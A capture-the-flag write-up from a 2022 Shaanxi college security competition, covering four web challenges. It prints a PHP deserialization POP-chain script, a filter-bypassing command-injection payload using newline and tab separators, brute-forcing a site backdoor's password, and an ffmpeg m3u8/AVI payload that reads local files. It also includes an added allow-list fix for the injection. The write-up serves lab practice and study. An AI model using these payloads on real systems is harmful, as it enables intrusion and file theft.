
2022 Shaanxi Provincial College Student Cyber Security Skills Competition (writeup)

Posted: 2023-01-09 10:44:52


popop

Visit class.php.

Simple; straight to the exploit:

<?php
// POP chain: s -> T -> L. T::$s carries the "Getflag" string and L holds a
// private property, so the serialized output contains NUL bytes; it is
// urlencoded so it can be sent safely in a request.

class s {
    public $f;
    public function __construct()
    {
        $this->f = new T;
    }
}

class T {
    public $f;
    public $s;
    public function __construct()
    {
        $this->s = "Getflag";
        $this->f = new L;
    }
}

class L {
    private $haha;
    public function __construct()
    {
        $this->haha = "mama";
    }
}

$o = new s;
echo urlencode(serialize($o));

Encrypted backdoor

Scanning the site with dirsearch turns up phpinfo.php, www.zip and fuck.php.

The leaked source looks like this:


phpinfo.php reveals a QQ number: 841350625

Absurd as it is, you add that QQ account.


Visiting a.txt gives a password dictionary; brute-forcing it with md5-hashed candidates yields the key: 18c92bfa21a90caa5cdf41c00db3a891


After connecting, the flag is in the root directory!

spa&col

Visit robots.txt.

It contains:

/9#S@Q&b?#Mm0+21?
/ix3n3.ksk

The first line is base92; decoding it gives the hint "Atbash Cipher".

Decoding /ix3n3.ksk with the Atbash cipher gives /rc3m3.php:

<?php
highlight_file(__FILE__);
error_reporting(0);
$code = $_POST['code'];
if (isset($code)) {
    if (preg_match('/ /', $code)) {
        die("IP Not Found.");
    } else {
        if (!(preg_match('/&|\||;|\$/', $code))) {
            echo exec("/bin/ping -c 4".$code);
        } else {
            die("Hacked By k3clov3r!");
        }
    }
}
?>

POST body used:

code=%0ased%09-n%09"2p"%09flag.php
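The filter in /rc3m3.php black-lists a handful of characters (space, &, |, ;, $) but still concatenates raw input into a shell command, so any separator it forgot to list slips through. Below is an added example, not part of the original writeup, of the allow-list fix a defender would apply: accept only a syntactically valid IP address via filter_var() and quote it with escapeshellarg(); the sample inputs are constructed for the demonstration.

```php
<?php
// Added example: original black-list check vs. an allow-list rewrite of /rc3m3.php.

// The original check, reproduced for comparison (true when the input is accepted).
function original_filter_accepts(string $code): bool
{
    if (preg_match('/ /', $code)) {
        return false;                         // "IP Not Found."
    }
    return !preg_match('/&|\||;|\$/', $code); // "Hacked By k3clov3r!"
}

// Hardened check: accept only a well-formed IPv4/IPv6 address, nothing else.
// There is no list of bad characters to maintain; anything that is not an
// address (including embedded newlines or tabs) is rejected outright.
function hardened_filter_accepts(string $code): bool
{
    return filter_var($code, FILTER_VALIDATE_IP) !== false;
}

// Build the ping command only after validation, and still quote the argument
// (defence in depth: escapeshellarg() wraps the value in single quotes).
function build_ping_command(string $code): ?string
{
    if (!hardened_filter_accepts($code)) {
        return null;
    }
    return '/bin/ping -c 4 ' . escapeshellarg($code);
}

// Constructed sample inputs: one real address, then inputs carrying the
// separators the original black-list does not cover (newline, tab) and one
// it does cover (semicolon).
$samples = [
    "127.0.0.1",
    "127.0.0.1\nextra",
    "127.0.0.1\textra",
    "127.0.0.1;extra",
];

foreach ($samples as $s) {
    printf("%-22s original:%-6s hardened:%-6s cmd:%s\n",
        json_encode($s),
        original_filter_accepts($s) ? 'pass' : 'block',
        hardened_filter_accepts($s) ? 'pass' : 'block',
        build_ping_command($s) ?? '(rejected)');
}
```

Run with `php example.php`: the original check passes the newline and tab variants, while the hardened check only ever lets the plain address reach the command line.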


upload demo

A ready-made exploit exists:

https://github.com/neex/ffmpeg-avi-m3u-xbin

python3 .\gen_xbin_avi.py file:///var/www/flag_aaaa.txt 123.avi

Upload the generated file as-is.


Or generate it by hand:

https://www.cnblogs.com/xkfz007/articles/6415527.html

Create the file 123.m3u8 and upload it:

#EXTM3U
#EXT-X-MEDIA-SEQUENCE:0
#EXTINF:10.0,
file:///var/www/flag_aaaa.txt
#EXT-X-ENDLIST


Source: https://www.cnblogs.com/seizer/p/17036293.html
